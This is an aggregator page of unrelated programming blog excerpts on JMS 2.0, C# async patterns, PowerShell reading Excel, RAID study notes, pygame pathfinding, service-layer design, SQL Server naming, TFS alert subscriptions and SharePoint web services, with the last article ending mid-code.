    "What's New in JMS 2.0" Part 1 and Part 2 provide comprehensive introduction to new messaging features introduced in JMS 2.0. The biggest improvement in JMS 2.0 is introduction of the "new simplified API". This was explained in the Java EE 7 Launch Technical Keynote. You can watch a complete replay here. Sending and Receiving a JMS message using JMS 1.1 requires lot of boilerplate code, primarily because the API was designed 10+ years ago. Here is a code that shows how to send a message using JMS 1.1 API: @Statelesspublic class ClassicMessageSender { @Resource(lookup = "java:comp/DefaultJMSConnectionFactory") ConnectionFactory connectionFactory; @Resource(mappedName = "java:global/jms/myQueue") Queue demoQueue; public void sendMessage(String payload) { Connection connection = null; try { connection = connectionFactory.createConnection(); connection.start(); Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE); MessageProducer messageProducer = session.createProducer(demoQueue); TextMessage textMessage = session.createTextMessage(payload); messageProducer.send(textMessage); } catch (JMSException ex) { ex.printStackTrace(); } finally { if (connection != null) { try { connection.close(); } catch (JMSException ex) { ex.printStackTrace(); } } } }} There are several issues with this code: A JMS ConnectionFactory needs to be created in a application server-specific way before this application can run. Application-specific destination needs to be created in an application server-specific way before this application can run. Several intermediate objects need to be created to honor the JMS 1.1 API, e.g. ConnectionFactory -> Connection -> Session -> MessageProducer -> TextMessage. Everything is a checked exception and so try/catch block must be specified. Connection need to be explicitly started and closed, and that bloats even the finally block. The new JMS 2.0 simplified API code looks like: @Statelesspublic class SimplifiedMessageSender { @Inject JMSContext context; @Resource(mappedName="java:global/jms/myQueue") Queue myQueue; public void sendMessage(String message) { context.createProducer().send(myQueue, message); }} The code is significantly improved from the previous version in the following ways: The JMSContext interface combines in a single object the functionality of both the Connection and the Session in the earlier JMS APIs.  You can obtain a JMSContext object by simply injecting it with the @Inject annotation.  No need to explicitly specify a ConnectionFactory. A default ConnectionFactory under the JNDI name of java:comp/DefaultJMSConnectionFactory is used if no explicit ConnectionFactory is specified. The destination can be easily created using newly introduced @JMSDestinationDefinition as: @JMSDestinationDefinition(name = "java:global/jms/myQueue",        interfaceName = "javax.jms.Queue") It can be specified on any Java EE component and the destination is created during deployment. JMSContext, Session, Connection, JMSProducer and JMSConsumer objects are now AutoCloseable. This means that these resources are automatically closed when they go out of scope. This also obviates the need to explicitly start the connection JMSException is now a runtime exception. Method chaining on JMSProducers allows to use builder patterns. No need to create separate Message object, you can specify the message body as an argument to the send() method instead. Want to try this code ? Download source code! Download Java EE 7 SDK and install. Start GlassFish: bin/asadmin start-domain Build the WAR (in the unzipped source code directory): mvn package Deploy the WAR: bin/asadmin deploy <source-code>/jms/target/jms-1.0-SNAPSHOT.war And access the application at http://localhost:8080/jms-1.0-SNAPSHOT/index.jsp to send and receive a message using classic and simplified API. A replay of JMS 2.0 session from Java EE 7 Launch Webinar provides complete details on what's new in this specification: Enjoy!

    Read the article

  • C# 5 Async, Part 2: Asynchrony Today

    - by Reed
    The .NET Framework has always supported asynchronous operations.  However, different mechanisms for supporting exist throughout the framework.  While there are at least three separate asynchronous patterns used through the framework, only the latest is directly usable with the new Visual Studio Async CTP.  Before delving into details on the new features, I will talk about existing asynchronous code, and demonstrate how to adapt it for use with the new pattern. The first asynchronous pattern used in the .NET framework was the Asynchronous Programming Model (APM).  This pattern was based around callbacks.  A method is used to start the operation.  It typically is named as BeginSomeOperation.  This method is passed a callback defined as an AsyncCallback, and returns an object that implements IAsyncResult.  Later, the IAsyncResult is used in a call to a method named EndSomeOperation, which blocks until completion and returns the value normally directly returned from the synchronous version of the operation.  Often, the EndSomeOperation call would be called from the callback function passed, which allows you to write code that never blocks. While this pattern works perfectly to prevent blocking, it can make quite confusing code, and be difficult to implement.  For example, the sample code provided for FileStream’s BeginRead/EndRead methods is not simple to understand.  In addition, implementing your own asynchronous methods requires creating an entire class just to implement the IAsyncResult. Given the complexity of the APM, other options have been introduced in later versions of the framework.  The next major pattern introduced was the Event-based Asynchronous Pattern (EAP).  This provides a simpler pattern for asynchronous operations.  It works by providing a method typically named SomeOperationAsync, which signals its completion via an event typically named SomeOperationCompleted. The EAP provides a simpler model for asynchronous programming.  It is much easier to understand and use, and far simpler to implement.  Instead of requiring a custom class and callbacks, the standard event mechanism in C# is used directly.  For example, the WebClient class uses this extensively.  A method is used, such as DownloadDataAsync, and the results are returned via the DownloadDataCompleted event. While the EAP is far simpler to understand and use than the APM, it is still not ideal.  By separating your code into method calls and event handlers, the logic of your program gets more complex.  It also typically loses the ability to block until the result is received, which is often useful.  Blocking often requires writing the code to block by hand, which is error prone and adds complexity. As a result, .NET 4 introduced a third major pattern for asynchronous programming.  The Task<T> class introduced a new, simpler concept for asynchrony.  Task and Task<T> effectively represent an operation that will complete at some point in the future.  This is a perfect model for thinking about asynchronous code, and is the preferred model for all new code going forward.  Task and Task<T> provide all of the advantages of both the APM and the EAP models – you have the ability to block on results (via Task.Wait() or Task<T>.Result), and you can stay completely asynchronous via the use of Task Continuations.  In addition, the Task class provides a new model for task composition and error and cancelation handling.  This is a far superior option to the previous asynchronous patterns. The Visual Studio Async CTP extends the Task based asynchronous model, allowing it to be used in a much simpler manner.  However, it requires the use of Task and Task<T> for all operations.

    Read the article

  • PowerShell: Read Excel to Create Inserts

    - by BuckWoody
    I’m writing a series of articles on how to migrate “departmental” data into SQL Server. I also hold workshops on the entire process – from discovering that the data exists to the modeling process and then how to design the Extract, Transform and Load (ETL) process. Finally I write about (and teach) a few methods on actually moving the data. One of those options is to use PowerShell. There are a lot of ways even with that choice, but the one I show is to read two columns from the spreadsheet and output statements that would insert the data using a stored procedure. Of course, you could re-write this as INSERT statements, out to a text file for bcp, or even use a database connection in the script to move the data directly from Excel into SQL Server. This snippet won’t run on your system, of course – it assumes a Microsoft Office Excel 2007 spreadsheet located at c:\temp called VendorList.xlsx. It looks for a tab in that spreadsheet called Vendors. The statement that does the writing just uses one column: Vendor Code. Here’s the breakdown of what I’m doing: In the first block, I connect to Microsoft Office Excel. That connection string is specific to Excel 2007, so if you need a different version you’ll need to look that up. In the second block I set up a selection from the entire spreadsheet based on that tab. Note that if you’re only after certain data you shouldn’t get the whole spreadsheet – that’s just good practice. In the next block I create the text I want, inserting the Vendor Code field as I go. Finally I close the connection. Enjoy! $ExcelConnection= New-Object -com "ADODB.Connection" $ExcelFile="c:\temp\VendorList.xlsx" $ExcelConnection.Open("Provider=Microsoft.ACE.OLEDB.12.0;` Data Source=$ExcelFile;Extended Properties=Excel 12.0;") $strQuery="Select * from [Vendors$]" $ExcelRecordSet=$ExcelConnection.Execute($strQuery) do { Write-Host "EXEC sp_InsertVendors '" $ExcelRecordSet.Fields.Item("Vendor Code").Value "'" $ExcelRecordSet.MoveNext()} Until ($ExcelRecordSet.EOF) $ExcelConnection.Close() Script Disclaimer, for people who need to be told this sort of thing: Never trust any script, including those that you find here, until you understand exactly what it does and how it will act on your systems. Always check the script on a test system or Virtual Machine, not a production system. All scripts on this site are performed by a professional stunt driver on a closed course. Your mileage may vary. Void where prohibited. Offer good for a limited time only. Keep out of reach of small children. Do not operate heavy machinery while using this script. If you experience blurry vision, indigestion or diarrhea during the operation of this script, see a physician immediately. Share this post: email it! | bookmark it! | digg it! | reddit! | kick it! | live it!

    Read the article

  • Organization &amp; Architecture UNISA Studies &ndash; Chap 6

    - by MarkPearl
    Learning Outcomes Discuss the physical characteristics of magnetic disks Describe how data is organized and accessed on a magnetic disk Discuss the parameters that play a role in the performance of magnetic disks Describe different optical memory devices Magnetic Disk The way data is stored on and retried from magnetic disks Data is recorded on and later retrieved form the disk via a conducting coil named the head (in many systems there are two heads) The writ mechanism exploits the fact that electricity flowing through a coil produces a magnetic field. Electric pulses are sent to the write head, and the resulting magnetic patterns are recorded on the surface below with different patterns for positive and negative currents The physical characteristics of a magnetic disk   Summarize from book   The factors that play a role in the performance of a disk Seek time – the time it takes to position the head at the track Rotational delay / latency – the time it takes for the beginning of the sector to reach the head Access time – the sum of the seek time and rotational delay Transfer time – the time it takes to transfer data RAID The rate of improvement in secondary storage performance has been considerably less than the rate for processors and main memory. Thus secondary storage has become a bit of a bottleneck. RAID works on the concept that if one disk can be pushed so far, additional gains in performance are to be had by using multiple parallel components. Points to note about RAID… RAID is a set of physical disk drives viewed by the operating system as a single logical drive Data is distributed across the physical drives of an array in a scheme known as striping Redundant disk capacity is used to store parity information, which guarantees data recoverability in case of a disk failure (not supported by RAID 0 or RAID 1) Interesting to note that the increase in the number of drives, increases the probability of failure. To compensate for this decreased reliability RAID makes use of stored parity information that enables the recovery of data lost due to a disk failure.   The RAID scheme consists of 7 levels…   Category Level Description Disks Required Data Availability Large I/O Data Transfer Capacity Small I/O Request Rate Striping 0 Non Redundant N Lower than single disk Very high Very high for both read and write Mirroring 1 Mirrored 2N Higher than RAID 2 – 5 but lower than RAID 6 Higher than single disk Up to twice that of a signle disk for read Parallel Access 2 Redundant via Hamming Code N + m Much higher than single disk Highest of all listed alternatives Approximately twice that of a single disk Parallel Access 3 Bit interleaved parity N + 1 Much higher than single disk Highest of all listed alternatives Approximately twice that of a single disk Independent Access 4 Block interleaved parity N + 1 Much higher than single disk Similar to RAID 0 for read, significantly lower than single disk for write Similar to RAID 0 for read, significantly lower than single disk for write Independent Access 5 Block interleaved parity N + 1 Much higher than single disk Similar to RAID 0 for read, lower than single disk for write Similar to RAID 0 for read, generally  lower than single disk for write Independent Access 6 Block interleaved parity N + 2 Highest of all listed alternatives Similar to RAID 0 for read; lower than RAID 5 for write Similar to RAID 0 for read, significantly lower than RAID 5  for write   Read page 215 – 221 for detailed explanation on RAID levels Optical Memory There are a variety of optical-disk systems available. Read through the table on page 222 – 223 Some of the devices include… CD CD-ROM CD-R CD-RW DVD DVD-R DVD-RW Blue-Ray DVD Magnetic Tape Most modern systems use serial recording – data is lade out as a sequence of bits along each track. The typical recording used in serial is referred to as serpentine recording. In this technique when data is being recorded, the first set of bits is recorded along the whole length of the tape. When the end of the tape is reached the heads are repostioned to record a new track, and the tape is again recorded on its whole length, this time in the opposite direction. That process continued back and forth until the tape is full. To increase speed, the read-write head is capable of reading and writing a number of adjacent tracks simultaneously. Data is still recorded serially along individual tracks, but blocks in sequence are stored on adjacent tracks as suggested. A tape drive is a sequential access device. Magnetic tape was the first kind of secondary memory. It is still widely used as the lowest-cost, slowest speed member of the memory hierarchy.

    Read the article

  • what is the best way to use loops to detect events while the main loop is running?

    - by yao jiang
    I am making an "game" that has pathfinding using pygame. I am using Astar algo. I have a main loop which draws the whole map. In the loop I check for events. If user press "enter" or "space", random start and end are selected, then animation starts and it will try to get from start to end. My draw function is stupid as hell right now, it works as expected but I feel that I am doing it wrong. It'll draw everything to the end of the animation. I am also detecting events in there as well. What is a better way of implementing the draw function such that it will draw one "step" at a time while checking for events? animating = False; while loop: check events: if not animating: # space or enter press will choose random start/end coords if enter_pressed or space_pressed: start, end = choose_coords route = find_route(start, end) draw(start, end, grid, route) else: # left click == generate an event to block the path # right click == user can choose a new destination if left_mouse_click: gen_event() reroute() elif right_mouse_click: new_end = new_end() new_start = current_pos() route = find_route(new_start, new_end) draw(new_start, new_end, grid, route) # draw out the grid def draw(start, end, grid, route_coord): # draw the end coords color = red; pick_image(screen, color, width*end[1],height*end[0]); pygame.display.flip(); # then draw the rest of the route for i in range(len(route_coord)): # pausing because we want animation time.sleep(speed); # get the x/y coords x,y = route_coord[i]; event_on = False; if grid[x][y] == 2: color = green; elif grid[x][y] == 3: color = blue; for event in pygame.event.get(): if event.type == pygame.MOUSEBUTTONDOWN: if event.button == 3: print "destination change detected, rerouting"; # get mouse position, px coords pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; grid[r][c] = 4; end = [r, c]; elif event.button == 1: print "user generated event"; pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; # mark it as a block for now grid[r][c] = 1; event_on = True; if check_events([x,y]) or event_on: # there is an event # mark it as a block for now grid[y][x] = 1; pick_image(screen, event_x, width*y, height*x); pygame.display.flip(); # then find a new route new_start = route_coord[i-1]; marked_grid, route_coord = find_route(new_start, end, grid); draw(new_start, end, grid, route_coord); return; # just end draw here so it wont throw the "index out of range" error elif grid[x][y] == 4: color = red; pick_image(screen, color, width*y, height*x); pygame.display.flip(); # clear route coord list, otherwise itll just add more unwanted coords route_coord_list[:] = [];

    Read the article

  • Doubts about several best practices for rest api + service layer

    - by TheBeefMightBeTough
    I'm going to be starting a project soon that exposes a restful api for business intelligence. It may not be limited to a restful api, so I plan to delegate requests to a service layer that then coordinates multiple domain objects (each of which have business logic local to the object). The api will likely have many calls as it is a long-term project. While thinking about the design, I recalled a few best practices. 1) Use command objects at the controller layer (I'm using Spring MVC). 2) Use DTOs at the service layer. 3) Validate in both the controller and service layer, though for different reasons. I have my doubts about these recommendations. 1) Using command objects adds a lot of extra single-purpose classes (potentially one per request). What exactly is the benefit? Annotation based validation can be done using this approach, sure. What if I have two requests that take the same parameters, but have different validation requirements? I would have to have two different classes with exactly the same members but different annotations? Bleh. 2) I have heard that using DTOs is preferable to parameters because it makes for more maintainable code down the road (say, e.g., requirements change and the service parameters need to be altered). I don't quite understand this. Shouldn't an api be more-or-less set in stone? I would understand that in the early phases of a project (or, especially, an entire company) the domain itself will not be well understood, and thus core domain objects may change along with the apis that manipulate these objects. At this point however the number of api methods should be small and their dependents few, so changes to the methods could easily be tolerated from a maintainability standpoint. In a large api with many methods and a substantial domain model, I would think having a DTO for potentially each domain object would become unwieldy. Am I misunderstanding something here? 3) I see validation in the controller and service layer as redundant in most cases. Why would I validate that parameters are not null and are in general well formed in the controller if the service is going to do exactly the same (and more). Couldn't I just do all the validation in the service and throw a runtime exception with a list of bad parameters then catch that in the controller to make the error messages more presentable? Better yet, couldn't I just make the error messages user-friendly in the service and let the exception trickle up to a global handler (ControllerAdvice in spring, for example)? Is there something wrong with either of these approaches? (I do see a use case for controller validation if the input does not map one-to-one with the service input, but since the controllers are for a rest api and not forms, the api parameters will probably map directly to service parameters.) I do also have a question about unchecked vs checked exceptions. Namely, I'm not really sure why I'd ever want to use a checked exception. Every time I have seen them used they just get wrapped into general exceptions (DomainException, SystemException, ApplicationException, w/e) to reduce the signature length of methods, or devs catch Exception rather than dealing with the App1Exception, App2Exception, Sys1Exception, Sys2Exception. I don't see how either of these practices is very useful. Why not just use unchecked exceptions always and catch the ones you actually do care about? You could just document what unchecked exceptions the method throws.

    Read the article

  • Criminals and Other Illegal Characters

    - by Most Valuable Yak (Rob Volk)
    SQLTeam's favorite Slovenian blogger Mladen (b | t) had an interesting question on Twitter: http://www.twitter.com/MladenPrajdic/status/347057950470307841 I liked Kendal Van Dyke's (b | t) reply: http://twitter.com/SQLDBA/status/347058908801667072 And he was right!  This is one of those pretty-useless-but-sounds-interesting propositions that I've based all my presentations on, and most of my blog posts. If you read all the replies you'll see a lot of good suggestions.  I particularly like Aaron Bertrand's (b | t) idea of going into the Unicode character set, since there are over 65,000 characters available.  But how to find an illegal character?  Detective work? I'm working on the premise that if SQL Server will reject it as a name it would throw an error.  So all we have to do is generate all Unicode characters, rename a database with that character, and catch any errors. It turns out that dynamic SQL can lend a hand here: IF DB_ID(N'a') IS NULL CREATE DATABASE [a]; DECLARE @c INT=1, @sql NVARCHAR(MAX)=N'', @err NVARCHAR(MAX)=N''; WHILE @c<65536 BEGIN BEGIN TRY SET @sql=N'alter database ' + QUOTENAME(CASE WHEN @c=1 THEN N'a' ELSE NCHAR(@c-1) END) + N' modify name=' + QUOTENAME(NCHAR(@c)); RAISERROR(N'*** Trying %d',10,1,@c) WITH NOWAIT; EXEC(@sql); SET @c+=1; END TRY BEGIN CATCH SET @err=ERROR_MESSAGE(); RAISERROR(N'Ooops - %d - %s',10,1,@c,@err) WITH NOWAIT; BREAK; END CATCH END SET @sql=N'alter database ' + QUOTENAME(NCHAR(@c-1)) + N' modify name=[a]'; EXEC(@sql); The script creates a dummy database "a" if it doesn't already exist, and only tests single characters as a database name.  If you have databases with single character names then you shouldn't run this on that server. It takes a few minutes to run, but if you do you'll see that no errors are thrown for any of the characters.  It seems that SQL Server will accept any character, no matter where they're from.  (Well, there's one, but I won't tell you which. Actually there's 2, but one of them requires some deep existential thinking.) The output is also interesting, as quite a few codes do some weird things there.  I'm pretty sure it's due to the font used in SSMS for the messages output window, not all characters are available.  If you run it using the SQLCMD utility, and use the -o switch to output to a file, and -u for Unicode output, you can open the file in Notepad or another text editor and see the whole thing. I'm not sure what character I'd recommend to answer Mladen's question.  I think the standard tab (ASCII 9) is fine.  There's also several specific separator characters in the original ASCII character set (decimal 28-31). But of all the choices available in Unicode whitespace, I think my favorite would be the Mongolian Vowel Separator.  Or maybe the zero-width space. (that'll be fun to print!)  And since this is Mladen we're talking about, here's a good selection of "intriguing" characters he could use.

    Read the article

  • TFS 2012 API Create Alert Subscriptions

    - by Bob Hardister
    Originally posted on: http://geekswithblogs.net/BobHardister/archive/2013/07/24/tfs-2012-api-create-alert-subscriptions.aspxThere were only a few post on this and I felt like really important information was left out: What the defaults are How to create the filter string Here’s the code to create the subscription. Get the Collection public TfsTeamProjectCollection GetCollection(string collectionUrl) { try { //connect to the TFS collection using the active user TfsTeamProjectCollection tpc = new TfsTeamProjectCollection(new Uri(collectionUrl)); tpc.EnsureAuthenticated(); return tpc; } catch (Exception) { return null; } } Use Impersonation Because my app is used to create “support tickets” as stories in TFS, I use impersonation so the subscription is setup for the “requester.”  That way I can take all the defaults for the subscription delivery preferences. public TfsTeamProjectCollection GetCollectionImpersonation(string collectionUrl, string impersonatingUserAccount) { // see: http://blogs.msdn.com/b/taylaf/archive/2009/12/04/introducing-tfs-impersonation.aspx try { TfsTeamProjectCollection tpc = GetCollection(collectionUrl); if (!(tpc == null)) { //get the TFS identity management service (v2 is 2012 only) IIdentityManagementService2 ims = tpc.GetService<IIdentityManagementService2>(); //look up the user we want to impersonate TeamFoundationIdentity identity = ims.ReadIdentity(IdentitySearchFactor.AccountName, impersonatingUserAccount, MembershipQuery.None, ReadIdentityOptions.None); //create a new connection using the impersonated user account //note: do not ensure authentication because the impersonated user may not have //windows authentication at execution if (!(identity == null)) { TfsTeamProjectCollection itpc = new TfsTeamProjectCollection(tpc.Uri, identity.Descriptor); return itpc; } else { //the user account is not found return null; } } else { return null; } } catch (Exception) { return null; } } Create the Alert Subscription public bool SetWiAlert(string collectionUrl, string projectName, int wiId, string emailAddress, string userAccount) { bool setSuccessful = false; try { //use impersonation so the event service creating the subscription will default to //the correct account: otherwise domain ambiguity could be a problem TfsTeamProjectCollection itpc = GetCollectionImpersonation(collectionUrl, userAccount); if (!(itpc == null)) { IEventService es = itpc.GetService(typeof(IEventService)) as IEventService; DeliveryPreference deliveryPreference = new DeliveryPreference(); //deliveryPreference.Address = emailAddress; deliveryPreference.Schedule = DeliverySchedule.Immediate; deliveryPreference.Type = DeliveryType.EmailHtml; //the following line does not work for two reasons: //string filter = string.Format("\"ID\" = '{0}' AND \"Authorized As\" <> '[Me]'", wiId); //1. the create fails because there is a space between Authorized As //2. the explicit query criteria are all incorrect anyway // see uncommented line for what does work: you have to create the subscription mannually // and then get it to view what the filter string needs to be (see following commented code) //this works string filter = string.Format("\"CoreFields/IntegerFields/Field[Name='ID']/NewValue\" = '12175'" + " AND \"CoreFields/StringFields/Field[Name='Authorized As']/NewValue\"" + " <> '@@MyDisplayName@@'", projectName, wiId); string eventName = string.Format("<PT N=\"ALM Ticket for Work Item {0}\"/>", wiId); es.SubscribeEvent("WorkItemChangedEvent", filter, deliveryPreference, eventName); ////use this code to get existing subscriptions: you can look at manually created ////subscriptions to see what the filter string needs to be //IIdentityManagementService2 ims = itpc.GetService<IIdentityManagementService2>(); //TeamFoundationIdentity identity = ims.ReadIdentity(IdentitySearchFactor.AccountName, // userAccount, // MembershipQuery.None, // ReadIdentityOptions.None); //var existingsubscriptions = es.GetEventSubscriptions(identity.Descriptor); setSuccessful = true; return setSuccessful; } else { return setSuccessful; } } catch (Exception) { return setSuccessful; } }

    Read the article

  • An Honest look at SharePoint Web Services

    - by juanlarios
    INTRODUCTION If you are a SharePoint developer you know that there are two basic ways to develop against SharePoint. 1) The object Model 2) Web services. SharePoint object model has the advantage of being quite rich. Anything you can do through the SharePoint UI as an administrator or end user, you can do through the object model. In fact everything that is done through the UI is done through the object model behind the scenes. The major disadvantage to getting at SharePoint this way is that the code needs to run on the server. This means that all web parts, event receivers, features, etc… all of this is code that is deployed to the server. The second way to get to SharePoint is through the built in web services. There are many articles on how to manipulate web services, how to authenticate to them and interact with them. The basic idea is that a remote application or process can contact SharePoint through a web service. Lots has been written about how great these web services are. This article is written to document the limitations, some of the issues and frustrations with working with SharePoint built in web services. Ultimately, for the tasks I was given to , SharePoint built in web services did not suffice. My evaluation of SharePoint built in services was compared against creating my own WCF Services to do what I needed. The current project I'm working on right now involved several "integration points". A remote application, installed on a separate server was to contact SharePoint and perform an task or operation. So I decided to start up Visual Studio and built a DLL and basically have 2 layers of logic. An integration layer and a data layer. A good friend of mine pointed me to SOLID principles and referred me to some videos and tutorials about it. I decided to implement the methodology (although a lot of the principles are common sense and I already incorporated in my coding practices). I was to deliver this dll to the application team and they would simply call the methods exposed by this dll and voila! it would do some task or operation in SharePoint. SOLUTION My integration layer implemented an interface that defined some of the basic integration tasks that I was to put together. My data layer was about the same, it implemented an interface with some of the tasks that I was going to develop. This gave me the opportunity to develop different data layers, ultimately different ways to get at SharePoint if I needed to. This is a classic SOLID principle. In this case it proved to be quite helpful because I wrote one data layer completely implementing SharePoint built in Web Services and another implementing my own WCF Service that I wrote. I should mention there is another layer underneath the data layer. In referencing SharePoint or WCF services in my visual studio project I created a class for every web service call. So for example, if I used List.asx. I created a class called "DocumentRetreival" this class would do the grunt work to connect to the correct URL, It would perform the basic operation of contacting the service and so on. If I used a view.asmx, I implemented a class called "ViewRetrieval" with the same idea as the last class but it would now interact with all he operations in view.asmx. This gave my data layer the ability to perform multiple calls without really worrying about some of the grunt work each class performs. This again, is a classic SOLID principle. So, in order to compare them side by side we can look at both data layers and with is involved in each. Lets take a look at the "Create Project" task or operation. The integration point is described as , "dll is to provide a way to create a project in SharePoint". Projects , in this case are basically document libraries. I am to implement a way in which a remote application can create a document library in SharePoint. Easy enough right? Use the list.asmx Web service in SharePoint. So here we go! Lets take a look at the code. I added the List.asmx web service reference to my project and this is the class that contacts it:  class DocumentRetrieval     {         private ListsSoapClient _service;      d   private bool _impersonation;         public DocumentRetrieval(bool impersonation, string endpt)         {             _service = new ListsSoapClient();             this.SetEndPoint(string.Format("{0}/{1}", endpt, ConfigurationManager.AppSettings["List"]));             _impersonation = impersonation;             if (_impersonation)             {                 _service.ClientCredentials.Windows.ClientCredential.Password = ConfigurationManager.AppSettings["password"];                 _service.ClientCredentials.Windows.ClientCredential.UserName = ConfigurationManager.AppSettings["username"];                 _service.ClientCredentials.Windows.AllowedImpersonationLevel =                     System.Security.Principal.TokenImpersonationLevel.Impersonation;             }     private void SetEndPoint(string p)          {             _service.Endpoint.Address = new EndpointAddress(p);          }          /// <summary>         /// Creates a document library with specific name and templateID         /// </summary>         /// <param name="listName">New list name</param>         /// <param name="templateID">Template ID</param>         /// <returns></returns>         public XmlElement CreateLibrary(string listName, int templateID, ref ExceptionContract exContract)         {             XmlDocument sample = new XmlDocument();             XmlElement viewCol = sample.CreateElement("Empty");             try             {                 _service.Open();                 viewCol = _service.AddList(listName, "", templateID);             }             catch (Exception ex)             {                 exContract = new ExceptionContract("DocumentRetrieval/CreateLibrary", ex.GetType(), "Connection Error", ex.StackTrace, ExceptionContract.ExceptionCode.error);                             }finally             {                 _service.Close();             }                                      return viewCol;         } } There was a lot more in this class (that I am not including) because i was reusing the grunt work and making other operations with LIst.asmx, For example, updating content types, changing or configuring lists or document libraries. One of the first things I noticed about working with the built in services is that you are really at the mercy of what is available to you. Before creating a document library (Project) I wanted to expose a IsProjectExisting method. This way the integration or data layer could recognize if a library already exists. Well there is no service call or method available to do that check. So this is what I wrote:   public bool DocLibExists(string listName, ref ExceptionContract exContract)         {             try             {                 var allLists = _service.GetListCollection();                                return allLists.ChildNodes.OfType<XmlElement>().ToList().Exists(x => x.Attributes["Title"].Value ==listName);             }             catch (Exception ex)             {                 exContract = new ExceptionContract("DocumentRetrieval/GetList/GetListWSCall", ex.GetType(), "Unable to Retrieve List Collection", ex.StackTrace, ExceptionContract.ExceptionCode.error);             }             return false;         } This really just gets an XMLElement with all the lists. It was then up to me to sift through the clutter and noise and see if Document library already existed. This took a little bit of getting used to. Now instead of working with code, you are working with XMLElement response format from web service. I wrote a LINQ query to go through and find if the attribute "Title" existed and had a value of the listname then it would return True, if not False. I didn't particularly like working this way. Dealing with XMLElement responses and then having to manipulate it to get at the exact data I was looking for. Once the check for the DocLibExists, was done, I would either create the document library or send back an error indicating the document library already existed. Now lets examine the code that actually creates the document library. It does what you are really after, it creates a document library. Notice how the template ID is really an integer. Every document library template in SharePoint has an ID associated with it. Document libraries, Image Library, Custom List, Project Tasks, etc… they all he a unique integer associated with it. Well, that's great but the client came back to me and gave me some specifics that each "project" or document library, should have. They specified they had 3 types of projects. Each project would have unique views, about 10 views for each project. Each Project specified unique configurations (auditing, versioning, content types, etc…) So what turned out to be a simple implementation of creating a document library as a repository for a project, turned out to be quite involved.  The first thing I thought of was to create a template for document library. There are other ways you can do this too. Using the web Service call, you could configure views, versioning, even content types, etc… the only catch is, you have to be working quite extensively with CAML. I am not fond of CAML. I can do it and work with it, I just don't like doing it. It is quite touchy and at times it is quite tough to understand where errors were made with CAML statements. Working with Web Services and CAML proved to be quite annoying. The service call would return a generic error message that did not particularly point me to a CAML statement syntax error, or even a CAML error. I was not sure if it was a security , performance or code based issue. It was quite tough to work with. At times it was difficult to work with because of the way SharePoint handles metadata. There are "Names", "Display Name", and "StaticName" fields. It was quite tough to understand at times, which one to use. So it took a lot of trial and error. There are tools that can help with CAML generation. There is also now intellisense for CAML statements in Visual Studio that might help but ultimately I'm not fond of CAML with Web Services.   So I decided on the template. So my plan was to create create a document library, configure it accordingly and then use The Template Builder that comes with the SharePoint SDK. This tool allows you to create site templates, list template etc… It is quite interesting because it does not generate an STP file, it actually generates an xml definition and a feature you can activate and make that template available on a site or site collection. The first issue I experienced with this is that one of the specifications to this template was that the "All Documents" view was to have 2 web parts on it. Well, it turns out that using the template builder , it did not include the web parts as part of the list template definition it generated. It backed up the settings, the views, the content types but not the custom web parts. I still decided to try this even without the web parts on the page. This new template defined a new Document library definition with a unique ID. The problem was that the service call accepts an int but it only has access to the built in library int definitions. Any new ones added or created will not be available to create. So this made it impossible for me to approach the problem this way.     I should also mention that one of the nice features about SharePoint is the ability to create list templates, back them up and then create lists based on that template. It can all be done by end user administrators. These templates are quite unique because they are saved as an STP file and not an xml definition. I also went this route and tried to see if there was another service call where I could create a document library based no given template name. Nope! none.      After some thinking I decide to implement a WCF service to do this creation for me. I was quite certain that the object model would allow me to create document libraries base on a template in which an ID was required and also templates saved as STP files. Now I don't want to bother with posting the code to contact WCF service because it's self explanatory, but I will post the code that I used to create a list with custom template. public ServiceResult CreateProject(string name, string templateName, string projectId)         {             string siteurl = SPContext.Current.Site.Url;             Guid webguid = SPContext.Current.Web.ID;                        using (SPSite site = new SPSite(siteurl))             {                 using (SPWeb rootweb = site.RootWeb)                 {                     SPListTemplateCollection temps = site.GetCustomListTemplates(rootweb);                     ProcessWeb(siteurl, webguid, web => Act_CreateProject(web, name, templateName, projectId, temps));                 }//SpWeb             }//SPSite              return _globalResult;                   }         private void Act_CreateProject(SPWeb targetsite, string name, string templateName, string projectId, SPListTemplateCollection temps) {                         var temp = temps.Cast<SPListTemplate>().FirstOrDefault(x => x.Name.Equals(templateName));             if (temp != null)             {                             try                 {                                         Guid listGuid = targetsite.Lists.Add(name, "", temp);                     SPList newList = targetsite.Lists[listGuid];                     _globalResult = new ServiceResult(true, "Success", "Success");                 }                 catch (Exception ex)                 {                     _globalResult = new ServiceResult(false, (string.IsNullOrEmpty(ex.Message) ? "None" : ex.Message + " " + templateName), ex.StackTrace.ToString());                 }                                       }        private void ProcessWeb(string siteurl, Guid webguid, Action<SPWeb> action) {                        using (SPSite sitecollection = new SPSite(siteurl)) {                 using (SPWeb web = sitecollection.AllWebs[webguid]) {                     action(web);                 }                     }                  } This code is actually some of the code I implemented for the service. there was a lot more I did on Project Creation which I will cover in my next blog post. I implemented an ACTION method to process the web. This allowed me to properly dispose the SPWEb and SPSite objects and not rewrite this code over and over again. So I implemented a WCF service to create projects for me, this allowed me to do a lot more than just create a document library with a template, it now gave me the flexibility to do just about anything the client wanted at project creation. Once this was implemented , the client came back to me and said, "we reference all our projects with ID's in our application. we want SharePoint to do the same". This has been something I have been doing for a little while now but I do hope that SharePoint 2010 can have more of an answer to this and address it properly. I have been adding metadata to SPWebs through property bag. I believe I have blogged about it before. This time it required metadata added to a document library. No problem!!! I also mentioned these web parts that were to go on the "All Documents" View. I took the opportunity to configure them to the appropriate settings. There were two settings that needed to be set on these web parts. One of them was a Project ID configured in the webpart properties. The following code enhances and replaces the "Act_CreateProject " method above:  private void Act_CreateProject(SPWeb targetsite, string name, string templateName, string projectId, SPListTemplateCollection temps) {                         var temp = temps.Cast<SPListTemplate>().FirstOrDefault(x => x.Name.Equals(templateName));             if (temp != null)             {                 SPLimitedWebPartManager wpmgr = null;                               try                 {                                         Guid listGuid = targetsite.Lists.Add(name, "", temp);                     SPList newList = targetsite.Lists[listGuid];                     SPFolder rootFolder = newList.RootFolder;                     rootFolder.Properties.Add(KEY, projectId);                     rootFolder.Update();                     if (rootFolder.ParentWeb != targetsite)                         rootFolder.ParentWeb.Dispose();                     if (!templateName.Contains("Natural"))                     {                         SPView alldocumentsview = newList.Views.Cast<SPView>().FirstOrDefault(x => x.Title.Equals(ALLDOCUMENTS));                         SPFile alldocfile = 